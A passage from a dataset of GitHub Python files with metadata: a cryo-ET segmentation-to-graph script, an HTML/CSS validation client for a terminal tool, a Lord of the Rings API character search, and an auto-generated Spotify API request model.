open(\"/home/subir_sbr/Desktop/\"+city+\".json\", \"w\",encoding='utf8') as writeJSON: \t#path of\n\t\tjson.dump(CompleteDict,writeJSON,ensure_ascii=False,sort_keys=True, indent=4)\n\n\nif __name__ == '__main__':\n\n\tCrawl_City(\"08\")\t# for agra\n\tCrawl_City(\"09\")\t# for aligarh\n\n \n ", "repo_name": "99sbr/Scraping", "sub_path": "Public-Portal-Data-Extraction/task.py", "file_name": "task.py", "file_ext": "py", "file_size_in_byte": 3086, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "selenium.webdriver.PhantomJS", "line_number": 18, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 18, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 21, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 31, "usage_type": "call"}, {"api_name": "string.ascii_lowercase", "line_number": 56, "usage_type": "attribute"}, {"api_name": "numpy.asarray", "line_number": 68, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 76, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 77, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 85, "usage_type": "call"}]} +{"seq_id": "70203226684", "text": "\"\"\"\n\n Add segmentation labels to GraphMCF objects in a STAR file which pairs them with the segmentation\n\n Input: - The STAR file\n\n Output: - New graph are pickled with the segmentation information\n\n\"\"\"\n\n__author__ = 'Antonio Martinez-Sanchez'\n\n# ################ Package import\n\nimport time\nimport pyseg as ps\nimport scipy as sp\nimport os\nimport sys\nimport numpy as np\ntry:\n import pickle as pickle\nexcept:\n import pickle\n\n########## Global variables\n\n########################################################################################\n# PARAMETERS\n########################################################################################\n\n####### Input data\n\nROOT_PATH = '/fs/pool/pool-lucic2'\n\n# Input STAR file with segmentations\nin_star = ROOT_PATH + '/antonio/workspace/psd_an/in/syn_seg_ves_glur_graph.star'\nin_g_star = ROOT_PATH + '/antonio/workspace/psd_an/in/syn_seg_glur.star'\n\n####### Output data\n\nout_dir = ROOT_PATH+'/ex/syn/graphs_ves'\nout_sufix = 'ves'\n\n####### Graph settings\n\ngh_pname = 'syn_seg'\ngh_clean = False\n\n####### Segmentation pre-processing\n\nsg_th = 8 # > is considered fg, if None segmentation labels are considered\nsg_lbl = 6 # label for be set on the graph, only applicable if sg_th is not None\nsg_ref = True # if True then segmentation is done in 'rlnMircographName' tomogram space, False for 'psSegImage' space\nsg_close = 1\n\n########################################################################################\n# MAIN ROUTINE\n########################################################################################\n\n# Print initial message\nprint('Adding segmentation to GraphMCF objects.')\nprint('\\tAuthor: ' + __author__)\nprint('\\tDate: ' + time.strftime(\"%c\") + '\\n')\nprint('Options:')\n# print '\\tDisPerSe persistence threshold (nsig): ' + str(nsig)\nprint('\\tSTAR file with the GraphMCF and segmentation pairs: ' + in_star)\nprint('\\tSTAR file with the GraphMCF info: ' + in_g_star)\nprint('\\tOutput directory: ' + out_dir)\nprint('\\t\\t-Files sufix: ' + out_sufix)\nprint('\\tGraph settings: ')\nprint('\\t\\t-Property name: ' + gh_pname)\nif gh_clean:\n print('\\t\\t-Clean old values for the selected property.')\nprint('\\tSegmentation processing: ')\nif sg_th is None:\n print('\\t\\t-Using segmentation labels.')\nelse:\n print('\\t\\t-Segmentation threshold: ' + str(sg_th))\n print('\\t\\t-Segmentation label: ' + str(sg_lbl))\nif sg_ref:\n print('\\t\\t-Reference space \\'rlnMicrographName\\'')\nelse:\n print('\\t\\t-Reference space \\'psSegImage\\'')\nprint('\\t\\t-Iterations for post closing: ' + str(sg_close))\nprint('')\n\nprint('Loading the input star file...')\nstar, graph_star = ps.sub.Star(), ps.sub.Star()\nstar.load(in_star)\ngraph_star.load(in_g_star)\nif not star.has_column('_psGhMCFPickle'):\n print('ERROR: input pairs STAR file has no \\'psGhMCFPickle\\' column.')\n print('Un-successfully terminated. (' + time.strftime(\"%c\") + ')')\n sys.exit(-1)\nif not star.has_column('_psSegImage'):\n print('ERROR: input pairs STAR file has no \\'psSegImage\\' column.')\n print('Un-successfully terminated. (' + time.strftime(\"%c\") + ')')\n sys.exit(-1)\nif not graph_star.has_column('_rlnMicrographName'):\n print('ERROR: input graph STAR file has no \\'rlnMicrographName\\' column.')\n print('Un-successfully terminated. (' + time.strftime(\"%c\") + ')')\n sys.exit(-1)\nif not graph_star.has_column('_psGhMCFPickle'):\n print('ERROR: input graph STAR file has no \\'psGhMCFPickle\\' column.')\n print('Un-successfully terminated. (' + time.strftime(\"%c\") + ')')\n sys.exit(-1)\ngraph_list = graph_star.get_column_data('_psGhMCFPickle')\n\n# Loop for processing the input data\nprint('Running main loop: ')\nfor row in range(star.get_nrows()):\n\n seg_file, graph_file = star.get_element('_psSegImage', row), star.get_element('_psGhMCFPickle', row)\n print('\\tPre-processing segmentation tomogram: ' + seg_file)\n mic_file = graph_star.get_element('_rlnMicrographName', row)\n try:\n seg = ps.disperse_io.load_tomo(seg_file).astype(np.uint16)\n except IOError:\n print('WARNING: input tomograms ' + seg_file + ' could not be read!')\n continue\n try:\n mic = ps.disperse_io.load_tomo(mic_file, mmap=True)\n except IOError:\n print('WARNING: input tomograms ' + mic_file + ' could not be read!')\n continue\n\n try:\n segg_row = graph_list.index(graph_file)\n except ValueError:\n print('WARNING: graph ' + graph_file + ' where not found on graphs STAR file!')\n continue\n segg_fname = graph_star.get_element('_psSegImage', segg_row)\n\n if sg_ref:\n print('\\tApplying rigid body transformation to fit segmentation...')\n if sg_th is None:\n p_ids = (np.arange(seg.shape[0]), np.arange(seg.shape[1]), np.arange(seg.shape[2]))\n else:\n p_ids = np.where(seg > sg_th)\n segg = ps.disperse_io.load_tomo(segg_fname)\n if os.path.splitext(segg_fname)[1] == '.fits':\n segg = segg.swapaxes(0, 1)\n seg = np.zeros(shape=segg.shape, dtype=np.uint16)\n mic_c = np.asarray((.5*mic.shape[0], .5*mic.shape[1], .5*mic.shape[2]), dtype=float)\n for i in range(len(p_ids[0])):\n point = np.asarray((p_ids[0][i], p_ids[1][i], p_ids[2][i]), dtype=float)\n # Segmentation rigid body transformations\n # Centering\n point -= mic_c\n # Rotation\n try:\n rot, tilt, psi = graph_star.get_element('_psSegRot', segg_row), \\\n graph_star.get_element('_psSegTilt', segg_row), \\\n graph_star.get_element('_psSegPsi', segg_row)\n M = ps.globals.rot_mat_relion(rot, tilt, psi, deg=True)\n hold = (M * point.reshape(3, 1)).reshape(3)[0]\n point[0], point[1], point[2] = hold[0, 0], hold[0, 1], hold[0, 2]\n except KeyError:\n pass\n # Un-centering\n point += mic_c\n # Cropping\n try:\n offy, offx, offz = graph_star.get_element('_psSegOffX', segg_row), \\\n graph_star.get_element('_psSegOffY', segg_row), \\\n graph_star.get_element('_psSegOffZ', segg_row)\n point -= np.asarray((offx, offy, offz), dtype=float)\n except KeyError:\n pass\n # Assign the label\n x, y, z = int(round(point[0])), int(round(point[1])), int(round(point[2]))\n if (x >= 0) and (x < seg.shape[0]) and (y >= 0) and (y < seg.shape[1]) and (z >= 0) and (z < seg.shape[2]):\n seg[x, y, z] = sg_lbl\n if sg_close > 0:\n print('\\t\\t-Closing...')\n hold_seg = sp.ndimage.morphology.binary_closing(seg==sg_lbl, structure=None, iterations=sg_close)\n seg = np.zeros(shape=hold_seg.shape, dtype=np.uint16)\n seg[hold_seg > 0] = sg_lbl\n if os.path.splitext(segg_fname)[1] == '.fits':\n seg = seg.swapaxes(0, 1)\n in_seg_file = os.path.splitext(os.path.split(seg_file)[1])[0]\n out_seg_file = out_dir + '/' + in_seg_file + '_' + out_sufix + '_seg.vti'\n print('\\t\\t-Storing transformed segmentation in: ' + out_seg_file)\n ps.disperse_io.save_numpy(seg, out_seg_file)\n\n print('\\tLoading the graph...')\n graph = ps.factory.unpickle_obj(graph_file)\n\n print('\\tAdding segmentation to graph...')\n graph.add_scalar_field_nn(seg, name=gh_pname, clean=gh_clean, bg=0)\n\n in_graph_stem = os.path.splitext(os.path.split(graph_file)[1])[0]\n out_graph_file = out_dir + '/' + in_graph_stem + '_' + out_sufix + '.pkl'\n print('\\tPickling updated graph in: ' + out_graph_file)\n graph.pickle(out_graph_file)\n graph_star.set_element('_psGhMCFPickle', segg_row, out_graph_file)\n ps.disperse_io.save_vtp(graph.get_vtp(av_mode=True, edges=True),\n out_dir + '/' + in_graph_stem + '_' + out_sufix + '_edges.vtp')\n\nin_star_stem = os.path.splitext(os.path.split(in_star)[1])[0]\nout_star = out_dir + '/' + in_star_stem + '_' + out_sufix + '.star'\nprint('\\tStoring output STAR file in: ' + out_star)\ngraph_star.store(out_star)\n\nprint('Terminated. (' + time.strftime(\"%c\") + ')')", "repo_name": "anmartinezs/pyseg_system", "sub_path": "code/pyseg/psd/seg_to_graph.py", "file_name": "seg_to_graph.py", "file_ext": "py", "file_size_in_byte": 8240, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 18, "dataset": "github-code", "pt": "41", "api": [{"api_name": "time.strftime", "line_number": 64, "usage_type": "call"}, {"api_name": "pyseg.sub.Star", "line_number": 89, "usage_type": "call"}, {"api_name": "pyseg.sub", "line_number": 89, "usage_type": "attribute"}, {"api_name": "time.strftime", "line_number": 94, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 95, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 98, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 99, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 102, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 103, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 106, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 107, "usage_type": "call"}, {"api_name": "pyseg.disperse_io.load_tomo", "line_number": 118, "usage_type": "call"}, {"api_name": "pyseg.disperse_io", "line_number": 118, "usage_type": "attribute"}, {"api_name": "numpy.uint16", "line_number": 118, "usage_type": "attribute"}, {"api_name": "pyseg.disperse_io.load_tomo", "line_number": 123, "usage_type": "call"}, {"api_name": "pyseg.disperse_io", "line_number": 123, "usage_type": "attribute"}, {"api_name": "numpy.arange", "line_number": 138, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 140, "usage_type": "call"}, {"api_name": "pyseg.disperse_io.load_tomo", "line_number": 141, "usage_type": "call"}, {"api_name": "pyseg.disperse_io", "line_number": 141, "usage_type": "attribute"}, {"api_name": "os.path.splitext", "line_number": 142, "usage_type": "call"}, {"api_name": "os.path", "line_number": 142, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 144, "usage_type": "call"}, {"api_name": "numpy.uint16", "line_number": 144, "usage_type": "attribute"}, {"api_name": "numpy.asarray", "line_number": 145, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 147, "usage_type": "call"}, {"api_name": "pyseg.globals.rot_mat_relion", "line_number": 156, "usage_type": "call"}, {"api_name": "pyseg.globals", "line_number": 156, "usage_type": "attribute"}, {"api_name": "numpy.asarray", "line_number": 168, "usage_type": "call"}, {"api_name": "scipy.ndimage.morphology.binary_closing", "line_number": 177, "usage_type": "call"}, {"api_name": "scipy.ndimage", "line_number": 177, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 178, "usage_type": "call"}, {"api_name": "numpy.uint16", "line_number": 178, "usage_type": "attribute"}, {"api_name": "os.path.splitext", "line_number": 180, "usage_type": "call"}, {"api_name": "os.path", "line_number": 180, "usage_type": "attribute"}, {"api_name": "os.path.splitext", "line_number": 182, "usage_type": "call"}, {"api_name": "os.path", "line_number": 182, "usage_type": "attribute"}, {"api_name": "os.path.split", "line_number": 182, "usage_type": "call"}, {"api_name": "pyseg.disperse_io.save_numpy", "line_number": 185, "usage_type": "call"}, {"api_name": "pyseg.disperse_io", "line_number": 185, "usage_type": "attribute"}, {"api_name": "pyseg.factory.unpickle_obj", "line_number": 188, "usage_type": "call"}, {"api_name": "pyseg.factory", "line_number": 188, "usage_type": "attribute"}, {"api_name": "os.path.splitext", "line_number": 193, "usage_type": "call"}, {"api_name": "os.path", "line_number": 193, "usage_type": "attribute"}, {"api_name": "os.path.split", "line_number": 193, "usage_type": "call"}, {"api_name": "pyseg.disperse_io.save_vtp", "line_number": 198, "usage_type": "call"}, {"api_name": "pyseg.disperse_io", "line_number": 198, "usage_type": "attribute"}, {"api_name": "os.path.splitext", "line_number": 201, "usage_type": "call"}, {"api_name": "os.path", "line_number": 201, "usage_type": "attribute"}, {"api_name": "os.path.split", "line_number": 201, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 206, "usage_type": "call"}]} +{"seq_id": "8147542802", "text": "\"\"\"\n This module handles the\n validation of HTML and\n CSS code of the website's\n user.\n\"\"\"\n\nimport re\nfrom time import sleep\nimport requests\nfrom requests.exceptions import HTTPError\nfrom bs4 import BeautifulSoup\nimport cfscrape\nfrom getch import pause\nfrom modules.validate.validate_input import Validate\nfrom modules.prints import (print_brand_name,\n run_choices_screen, del_last_lines_up)\nfrom modules.regex import VALID_SUBTRING\n\n\ndef run_options():\n \"\"\"\n Function to display options.\n\n ....\n Args:\n None\n ....\n Returns:\n No explicit return set.\n ....\n \"\"\"\n\n del_last_lines_up(1000)\n print_brand_name()\n run_choices_screen()\n\n\ndef choose_another_option_input():\n \"\"\"\n Function to display another\n option input.\n\n ....\n Args:\n None\n ....\n Returns:\n No explicit return set.\n ....\n \"\"\"\n\n while True:\n # Creating a new Validate object\n another = Validate.another_cls()\n # Validating the input against valid items\n response_another = another[0].validate_input(\n another[0], another[1])\n\n if response_another[0] and response_another[1] == 'y':\n break\n\n\ndef error_choose_another_option():\n \"\"\"\n Function to trigger\n choose_another_option_input() &\n run_options() functions\n to user if response from service\n isn't 200, 201 or 202.\n\n ....\n Args:\n None\n ....\n Returns:\n No explicit return set.\n ....\n \"\"\"\n\n choose_another_option_input()\n run_options()\n\n\ndef choose_another_option():\n \"\"\"\n Function to trigger\n choose_another_option_input() &\n run_options() functions to user\n when code has been validated.\n\n ....\n Args:\n None\n ....\n Returns:\n No explicit return set.\n ....\n \"\"\"\n\n del_last_lines_up(1)\n print(\"Well done, there were no errors!\")\n choose_another_option_input()\n run_options()\n\n\ndef try_res(response):\n \"\"\"\n Function to test reponse\n of validator.\n\n ....\n Args:\n self.res_check = requests.get()\n ....\n Returns:\n Set to return either True or\n False depending on the\n response outcome.\n ....\n \"\"\"\n\n try:\n if response not in [200, 201, 202]:\n raise HTTPError(\n f\"Response: {response}\"\n )\n\n except HTTPError as http_err:\n print(\"Validation Service Error: \"\n f\"{http_err}, please try again, later.\")\n return False\n\n except requests.exceptions.ConnectionError:\n print(\"This validation service can't be \"\n \"reached, please try again, later.\")\n return False\n\n else:\n return True\n\n\nclass ValidateCode:\n \"\"\"\n Class to validate requested\n codes from either options of\n 1. HTML or 2. CSS\n\n ....\n Args:\n int(option), str(url)\n ....\n Returns:\n Class pass on str(self.data)\n to it's inherited classes\n Html and Css.\n ....\n \"\"\"\n\n def __init__(self, option, url):\n self.option = option\n self.url = url\n\n self.service = ''\n self.res_validator = None\n\n self.html = f\"https://validator.nu/?doc={url}\"\n self.css = f\"https://jigsaw.w3.org/css-validator/validator?uri={url}\"\n\n self.headers = {'Referrer': 'https://webalyzer.heokuapp.com',\n 'User-Agent': 'Mozilla/5.0 (platform; '\n 'rv:geckoversion) Gecko/geckotrail '\n 'Firefox/firefoxversion',\n 'Accept': 'text/html',\n 'Accept-Encoding': 'gzip, compress', }\n\n self.data = None\n\n with requests.Session() as re_s:\n re_s = cfscrape.create_scraper()\n re_s.headers = self.headers\n\n del_last_lines_up(14)\n if self.option == '1':\n print(\"Checking Validator.nu Service!\")\n self.service = \"Validator.nu\"\n self.res_check = requests.get(\n 'https://validator.nu').status_code\n sleep(1.2)\n del_last_lines_up(1)\n\n elif self.option == '2':\n print(\"Checking Jigsaw.w3.org Service!\")\n self.service = \"Jigsaw.w3.org\"\n self.res_check = requests.get(\n 'https://jigsaw.w3.org/css-validator/').status_code\n sleep(1.2)\n del_last_lines_up(1)\n\n self.res_validator = try_res(self.res_check)\n\n def grab_validation(self, request):\n self.data = BeautifulSoup(request.content, 'html5lib')\n self.data.prettify()\n\n return self.data\n\n if not self.res_validator:\n print()\n choose_another_option_input()\n run_options()\n\n elif self.option == '1':\n print(\"Checking Successfull!\")\n sleep(1)\n del_last_lines_up(1)\n print(\"Retriving Results :)\")\n res = re_s.get(self.html)\n grab_validation(self, res)\n sleep(1)\n del_last_lines_up(1)\n else:\n print(\"Checking Successfull!\")\n sleep(1)\n del_last_lines_up(1)\n print(\"Retriving Results :)\")\n res = re_s.get(self.css)\n grab_validation(self, res)\n sleep(1)\n del_last_lines_up(1)\n\n def __str__(self):\n # __str__ avoids sending the\n # object's name and id in memory,\n # instead sends the actual usable data\n return str(self.data)\n\n\nclass Html(ValidateCode):\n \"\"\"\n Class to send validated\n HTML code to err().\n\n ....\n Args:\n str(self.data=(scraped HTML of validated service))\n ....\n Returns:\n Class is not set to explicitly other\n than passed on to err() after a try for error\n has been made.\n ....\n \"\"\"\n\n def __init__(self, option, data):\n super().__init__(option, data)\n\n self.all_lis = None\n self.all_errors = None\n\n if self.data is not None:\n try:\n self.all_lis = self.data.find('ol')\n if self.all_lis == \"'Html' object has no attribute 'data'\":\n raise AttributeError(\n f\"No Response: {self.all_lis}\"\n )\n except AttributeError as data_err:\n del_last_lines_up(3)\n print(\"Ohh.. noo.. There's an error!\\n\"\n \"Error: Did not receive data from validator, \"\n \"instead got:\\n\"\n f\"{data_err}\"\n \"\\n\\nWhich basically means; that the \"\n \"validator has an issue.\\n\")\n sleep(3)\n\n else:\n print(\"Processing Results..\")\n sleep(1)\n\n def err(self):\n \"\"\"\n Function to filter\n errors for the terminal.\n\n ....\n Args:\n str(data=(scraped HTML of validated service))\n ....\n Returns:\n Class medthod is not set to\n return True after printed in the terminal\n of either errors or a no error message.\n ....\n \"\"\"\n\n if self.all_lis is not None:\n try:\n self.all_errors = self.all_lis.find_all('li')\n if self.all_errors == \"'Html' object has no attribute 'data'\":\n raise AttributeError()\n\n except AttributeError:\n error_choose_another_option()\n return True\n\n else:\n try:\n errors_list = []\n for list_item in self.all_errors:\n count = 0\n for li in list_item.find('li', {'class': 'error'}):\n if count == 2:\n continue\n errors_list.append(li.text)\n count += 1\n\n except TypeError:\n choose_another_option()\n\n else:\n print(\"We received the following errors:\\n\")\n\n for error in errors_list:\n for line in error:\n print(\"On line:\", line)\n sleep(.4)\n print()\n\n pause(\n message=\"\\x1b[3mPress any key to continue...\\x1b[23m\")\n del_last_lines_up(1000)\n print_brand_name()\n run_choices_screen()\n\n return True\n\n\nclass Css(ValidateCode):\n \"\"\"\n Class to send validated\n CSS code to err().\n\n ....\n Args:\n str(self.data=(scraped HTML of validated service))\n ....\n Returns:\n Class medthod is not set to\n return True after printed in the terminal\n of either errors or a no error message.\n ....\n \"\"\"\n\n def __init__(self, option, data):\n super().__init__(option, data)\n\n self.trs = None\n\n if self.data is not None:\n try:\n self.trs = set(self.data.find_all('tr', {'class': 'error'}))\n if self.trs == \"'Css' object has no attribute 'data'\":\n raise AttributeError(\n f\"No Response: {self.trs}\"\n )\n\n except AttributeError as data_err:\n del_last_lines_up(3)\n print(\"Ohh.. noo.. There's an error!\\n\"\n \"Error: Did not receive data from validator, \"\n \"instead got:\\n\"\n f\"{data_err}\"\n \"\\n\\nWhich basically means \"\n \"that the validator has an issue.\\n\")\n sleep(3)\n\n else:\n print(\"Processing Results..\")\n sleep(1)\n\n def err(self):\n \"\"\"\n Function to filter\n errors for the terminal.\n\n ....\n Args:\n str(data=(scraped CSS of validated service))\n ....\n Returns:\n Class is not set to explicitly\n return anything other than printing\n in the terminal of either errors\n or a no error message.\n ....\n \"\"\"\n\n if self.trs is not None:\n try:\n if self.trs in self.trs == (\"'Css' object \"\n \"has no attribute 'trs'\"):\n raise AttributeError()\n\n except AttributeError:\n error_choose_another_option()\n\n else:\n error_list = []\n for tr in self.trs:\n tr_text = tr.text\n\n valid_text = re.findall(VALID_SUBTRING, tr_text)\n for idx in valid_text:\n index = valid_text.index(idx)\n if not len(idx) > 6:\n continue\n replace_text = re.sub(' : ', ': ', idx)\n valid_text[index] = replace_text\n error_list.append(valid_text)\n\n if len(error_list) != 0:\n error_list_wo_dups = set(tuple(err_sub)\n for err_sub in error_list)\n del_last_lines_up(5)\n print(\"We received the following errors:\\n\")\n\n for err_l in error_list_wo_dups:\n error_message = re.sub(\n r\"(\\s\\s+)\", ' ', ' '.join(err_l))\n\n print(\"On line:\", error_message)\n print()\n sleep(.4)\n\n pause(\n message=\"\\x1b[3mPress any key to continue...\\x1b[23m\")\n del_last_lines_up(1000)\n print_brand_name()\n run_choices_screen()\n\n else:\n choose_another_option()\n\n return True\n", "repo_name": "MTraveller/webalyzer", "sub_path": "modules/validate/validate_code.py", "file_name": "validate_code.py", "file_ext": "py", "file_size_in_byte": 12630, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "modules.prints.del_last_lines_up", "line_number": 34, "usage_type": "call"}, {"api_name": "modules.prints.print_brand_name", "line_number": 35, "usage_type": "call"}, {"api_name": "modules.prints.run_choices_screen", "line_number": 36, "usage_type": "call"}, {"api_name": "modules.validate.validate_input.Validate.another_cls", "line_number": 55, "usage_type": "call"}, {"api_name": "modules.validate.validate_input.Validate", "line_number": 55, "usage_type": "name"}, {"api_name": "modules.prints.del_last_lines_up", "line_number": 101, "usage_type": "call"}, {"api_name": "requests.exceptions.HTTPError", "line_number": 125, "usage_type": "call"}, {"api_name": "requests.exceptions.HTTPError", "line_number": 129, "usage_type": "name"}, {"api_name": "requests.exceptions", "line_number": 134, "usage_type": "attribute"}, {"api_name": "requests.Session", "line_number": 179, "usage_type": "call"}, {"api_name": "cfscrape.create_scraper", "line_number": 180, "usage_type": "call"}, {"api_name": "modules.prints.del_last_lines_up", "line_number": 183, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 187, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 189, "usage_type": "call"}, {"api_name": "modules.prints.del_last_lines_up", "line_number": 190, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 195, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 197, "usage_type": "call"}, {"api_name": "modules.prints.del_last_lines_up", "line_number": 198, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 203, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 215, "usage_type": "call"}, {"api_name": "modules.prints.del_last_lines_up", "line_number": 216, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 220, "usage_type": "call"}, {"api_name": "modules.prints.del_last_lines_up", "line_number": 221, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 224, "usage_type": "call"}, {"api_name": "modules.prints.del_last_lines_up", "line_number": 225, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 229, "usage_type": "call"}, {"api_name": "modules.prints.del_last_lines_up", "line_number": 230, "usage_type": "call"}, {"api_name": "modules.prints.del_last_lines_up", "line_number": 269, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 276, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 280, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 328, "usage_type": "call"}, {"api_name": "getch.pause", "line_number": 331, "usage_type": "call"}, {"api_name": "modules.prints.del_last_lines_up", "line_number": 333, "usage_type": "call"}, {"api_name": "modules.prints.print_brand_name", "line_number": 334, "usage_type": "call"}, {"api_name": "modules.prints.run_choices_screen", "line_number": 335, "usage_type": "call"}, {"api_name": "modules.prints.del_last_lines_up", "line_number": 370, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 377, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 381, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 414, "usage_type": "call"}, {"api_name": "modules.regex.VALID_SUBTRING", "line_number": 414, "usage_type": "argument"}, {"api_name": "re.sub", "line_number": 419, "usage_type": "call"}, {"api_name": "modules.prints.del_last_lines_up", "line_number": 426, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 430, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 435, "usage_type": "call"}, {"api_name": "getch.pause", "line_number": 437, "usage_type": "call"}, {"api_name": "modules.prints.del_last_lines_up", "line_number": 439, "usage_type": "call"}, {"api_name": "modules.prints.print_brand_name", "line_number": 440, "usage_type": "call"}, {"api_name": "modules.prints.run_choices_screen", "line_number": 441, "usage_type": "call"}]} +{"seq_id": "3409605456", "text": "import requests \n\n\n# get api key from text\ndef get_api_key():\n try:\n with open('api_key.txt', 'r') as file:\n api_key = file.read().strip()\n return api_key\n except FileNotFoundError:\n print(\"Error: 'api_key.txt' not found.\")\n return None\n # api key \nuser_api_key = get_api_key()\n\ndef search_characters_by_race(race):\n api_key = user_api_key\n url = f'https://the-one-api.dev/v2/character?race={race}'\n headers = {'Authorization': f'Bearer {api_key}'}\n\n try:\n response = requests.get(url, headers=headers)\n response_json = response.json()\n\n if response.status_code == 200 and response_json['docs']:\n print(f\"Characters belonging to the race '{race}':\")\n for character in response_json['docs']:\n print(character['name'])\n else:\n print(f\"No characters found belonging to the race '{race}'.\")\n except requests.exceptions.RequestException as e:\n print(f\"Error: {e}\")\n\n# Prompt the user for a race to search for characters\nrace = input(\"Enter the race to search for characters: \")\nsearch_characters_by_race(race)", "repo_name": "onamemba/api_integration", "sub_path": "search_characters_by_race.py", "file_name": "search_characters_by_race.py", "file_ext": "py", "file_size_in_byte": 1154, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "requests.get", "line_number": 22, "usage_type": "call"}, {"api_name": "requests.exceptions", "line_number": 31, "usage_type": "attribute"}]} +{"seq_id": "72178090684", "text": "# coding: utf-8\n\n\"\"\"\n Spotify Web API with fixes and improvements from sonallux\n\n You can use Spotify's Web API to discover music and podcasts, manage your Spotify library, control audio playback, and much more. Browse our available Web API endpoints using the sidebar at left, or via the navigation bar on top of this page on smaller screens. In order to make successful Web API requests your app will need a valid access token. One can be obtained through OAuth 2.0. The base URI for all Web API requests is `https://api.spotify.com/v1`. Need help? See our Web API guides for more information, or visit the Spotify for Developers community forum to ask questions and connect with other developers. \n\n The version of the OpenAPI document: 2023.8.30\n Generated by OpenAPI Generator (https://openapi-generator.tech)\n\n Do not edit the class manually.\n\"\"\" # noqa: E501\n\n\nfrom __future__ import annotations\nimport pprint\nimport re # noqa: F401\nimport json\n\n\nfrom typing import Any, Dict, List, Optional\nfrom pydantic import BaseModel, Field, StrictInt, StrictStr, conlist\n\nclass StartAUsersPlaybackRequest(BaseModel):\n \"\"\"\n StartAUsersPlaybackRequest\n \"\"\"\n context_uri: Optional[StrictStr] = Field(None, description=\"Optional. Spotify URI of the context to play. Valid contexts are albums, artists & playlists. `{context_uri:\\\"spotify:album:1Je1IMUlBXcx1Fz0WE7oPT\\\"}` \")\n uris: Optional[conlist(StrictStr)] = Field(None, description=\"Optional. A JSON array of the Spotify track URIs to play. For example: `{\\\"uris\\\": [\\\"spotify:track:4iV5W9uYEdYUVa79Axb7Rh\\\", \\\"spotify:track:1301WleyT98MSxVHPZCA6M\\\"]}` \")\n offset: Optional[Dict[str, Any]] = Field(None, description=\"Optional. Indicates from where in the context playback should start. Only available when context_uri corresponds to an album or playlist object \\\"position\\\" is zero based and can’t be negative. Example: `\\\"offset\\\": {\\\"position\\\": 5}` \\\"uri\\\" is a string representing the uri of the item to start at. Example: `\\\"offset\\\": {\\\"uri\\\": \\\"spotify:track:1301WleyT98MSxVHPZCA6M\\\"}` \")\n position_ms: Optional[StrictInt] = Field(None, description=\"Indicates from what position to start playback. Must be a positive number. Passing in a position that is greater than the length of the track will cause the player to start playing the next song. \")\n additional_properties: Dict[str, Any] = {}\n __properties = [\"context_uri\", \"uris\", \"offset\", \"position_ms\"]\n\n class Config:\n \"\"\"Pydantic configuration\"\"\"\n allow_population_by_field_name = True\n validate_assignment = True\n\n def to_str(self) -> str:\n \"\"\"Returns the string representation of the model using alias\"\"\"\n return pprint.pformat(self.dict(by_alias=True))\n\n def to_json(self) -> str:\n \"\"\"Returns the JSON representation of the model using alias\"\"\"\n return json.dumps(self.to_dict())\n\n @classmethod\n def from_json(cls, json_str: str) -> StartAUsersPlaybackRequest:\n \"\"\"Create an instance of StartAUsersPlaybackRequest from a JSON string\"\"\"\n return cls.from_dict(json.loads(json_str))\n\n def to_dict(self):\n \"\"\"Returns the dictionary representation of the model using alias\"\"\"\n _dict = self.dict(by_alias=True,\n exclude={\n \"additional_properties\"\n },\n exclude_none=True)\n # puts key-value pairs in additional_properties in the top level\n if self.additional_properties is not None:\n for _key, _value in self.additional_properties.items():\n _dict[_key] = _value\n\n return _dict\n\n @classmethod\n def from_dict(cls, obj: dict) -> StartAUsersPlaybackRequest:\n \"\"\"Create an instance of StartAUsersPlaybackRequest from a dict\"\"\"\n if obj is None:\n return None\n\n if not isinstance(obj, dict):\n return StartAUsersPlaybackRequest.parse_obj(obj)\n\n _obj = StartAUsersPlaybackRequest.parse_obj({\n \"context_uri\": obj.get(\"context_uri\"),\n \"uris\": obj.get(\"uris\"),\n \"offset\": obj.get(\"offset\"),\n \"position_ms\": obj.get(\"position_ms\")\n })\n # store additional fields in additional_properties\n for _key in obj.keys():\n if _key not in cls.__properties:\n _obj.additional_properties[_key] = obj.get(_key)\n\n return _obj\n\n\n", "repo_name": "Motyak/openapi-WIP", "sub_path": "out_python/openapi_client/models/start_a_users_playback_request.py", "file_name": "start_a_users_playback_request.py", "file_ext": "py", "file_size_in_byte": 4718, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": 